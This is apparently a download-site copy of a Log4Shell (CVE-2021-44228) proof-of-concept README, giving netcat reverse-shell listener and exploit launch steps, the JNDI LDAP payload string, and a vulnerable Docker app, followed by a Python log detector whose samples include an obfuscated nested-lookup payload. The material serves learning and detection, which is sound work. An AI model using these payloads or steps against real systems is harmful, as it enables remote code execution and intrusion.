log4j-shell-poc-main

  • Author: a1098346640
  • Development tool: Python
  • File size: 38.6MB
  • File format: zip
  • Favorites: 0
  • Download cost: 5 points
  • Downloads: 0
  • Upload date: 2022-05-28 19:35
log4j-shell-poc-main.zip
Description
# log4j-shell-poc

A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability.

Recently there was a new vulnerability in log4j, a Java logging library that is very widely used in the likes of Elasticsearch, Minecraft and numerous others. In this repository we have made an example vulnerable application and a proof-of-concept (POC) exploit for it.

A video showing the exploitation process
----------------------------------------

Vuln Web App: https://user-images.githubusercontent.com/87979263/146113359-20663eaa-555d-4d60-828d-a7f769ebd266.mp4

Ghidra (Old script): https://user-images.githubusercontent.com/87979263/145728478-b4686da9-17d0-4511-be74-c6e6fff97740.mp4

Minecraft PoC (Old script): https://user-images.githubusercontent.com/87979263/145681727-2bfd9884-a3e6-45dd-92e2-a624f29a8863.mp4

Proof-of-concept (POC)
----------------------

As a PoC we have created a Python file that automates the process.

#### Requirements:

```bash
pip install -r requirements.txt
```

#### Usage:

* Start a netcat listener to accept the reverse shell connection.

  ```bash
  nc -lvnp 9001
  ```

* Launch the exploit.

  **Note:** For this to work, the extracted Java archive has to be named `jdk1.8.0_20` and be in the same directory.

  ```console
  $ python3 poc.py --userip localhost --webport 8000 --lport 9001
  [!] CVE: CVE-2021-44228
  [!] Github repo: https://github.com/kozmer/log4j-shell-poc
  [+] Exploit java class created success
  [+] Setting up fake LDAP server
  [+] Send me: ${jndi:ldap://localhost:1389/a}
  Listening on 0.0.0.0:1389
  ```

This script will set up the HTTP server and the LDAP server for you, and it will also create the payload that you can paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.

Our vulnerable application
--------------------------

We have added a Dockerfile with the vulnerable webapp. You can use this by following the steps below:

```bash
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc
```

Once it is running, you can access it on localhost:8080.

If you would like to further develop the project you can use the IntelliJ IDE, which we used to develop the project. We have also included a `.idea` folder with configuration files which make the job a bit easier. You can probably use other IDEs too.

Getting the Java version
------------------------

At the time of creating the exploit we were unsure of exactly which versions of Java work and which don't, so we chose to work with one of the earliest versions of Java 8: `java-8u20`. Oracle thankfully provides an archive for all previous Java versions:
[https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).
Scroll down to `8u20` and download the appropriate files for your operating system and hardware.

![Screenshot from 2021-12-11 00-09-25](https://user-images.githubusercontent.com/46561460/145655967-b5808b9f-d919-476f-9cbc-ed9eaff51585.png)

**Note:** You do need to make an account to be able to download the package.

Once you have downloaded and extracted the archive, you can find `java` and a few related binaries in `jdk1.8.0_20/bin`.

**Note:** Please make sure to extract the jdk folder into this repository with the same name in order for it to work.

```console
❯ tar -xf jdk-8u20-linux-x64.tar.gz
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)
```

Disclaimer
----------

This repository is not intended to be a one-click exploit for CVE-2021-44228. The purpose of this project is to help people learn about this awesome vulnerability, and perhaps test their own applications (however there are better applications for this purpose, e.g. [https://log4shell.tools/](https://log4shell.tools/)).

Our team will not aid or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or have permission to pentest it.
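The Usage section above shows the lookup string the PoC hands to the vulnerable parameter. As an added example that is not part of this repository, the following Python detector flags such strings in web-server access logs, first resolving the nested `${lower:...}` / `${name:-x}` lookups that log4j evaluates before the JNDI lookup so they do not slip past a plain substring match; the log lines are constructed samples.

```python
"""Added example: flag CVE-2021-44228 lookup strings (like the one the PoC
prints) in web-server log lines, for detection rather than exploitation."""
import re
from typing import List, Tuple

# log4j resolves inner lookups before the jndi: lookup runs, so a detector must
# do the same: ${lower:x} / ${upper:x} -> x, and ${name:-x} (default value) -> x.
_INNER = re.compile(
    r"\$\{(?:(?:lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}", re.IGNORECASE)
# The lookup itself: scheme and callback target (host:port/path).
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop)://([^}\s]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str) -> List[Tuple[str, str]]:
    """Return (scheme, target) for every JNDI lookup in a normalized line."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, target) for each line carrying a lookup."""
    return [(n, s, t) for n, line in enumerate(lines, 1) for s, t in find_jndi(line)]


# Constructed sample access-log lines: the second carries the PoC's own payload
# in the User-Agent field, the third reaches the same target via a nested lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://localhost:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:ldap://localhost:1389/a} HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for n, scheme, target in scan(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {scheme} -> {target}")
```

The extracted target is the host and port the application would call back to, which is what you would compare against the fake LDAP listener (port 1389 above) when triaging an alert.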